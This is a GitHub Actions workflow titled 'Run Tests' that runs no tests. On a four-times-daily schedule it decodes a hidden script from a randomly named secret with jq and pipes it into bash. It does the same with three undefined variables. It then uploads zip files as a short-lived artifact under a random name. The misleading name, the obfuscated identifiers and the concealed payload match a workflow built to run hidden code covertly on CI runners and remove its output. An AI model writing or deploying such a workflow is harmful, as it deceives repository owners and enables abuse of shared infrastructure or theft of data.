name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '35 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          vmecg75686: ${{ secrets.vmecg75686 }}
        run: |
          printf '%s' "$vmecg75686" | jq -r .ifub399 | /bin/bash
          printf '%s' "$rfnm14429" | jq -r .rob76512 | /bin/bash
          printf '%s' "$buafl9" | jq -r .gjnlk16200 | /bin/bash
          printf '%s' "$lzw7567" | jq -r .fg4977 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: Y5bRY22J
          path: "*.zip"
          retention-days: 1
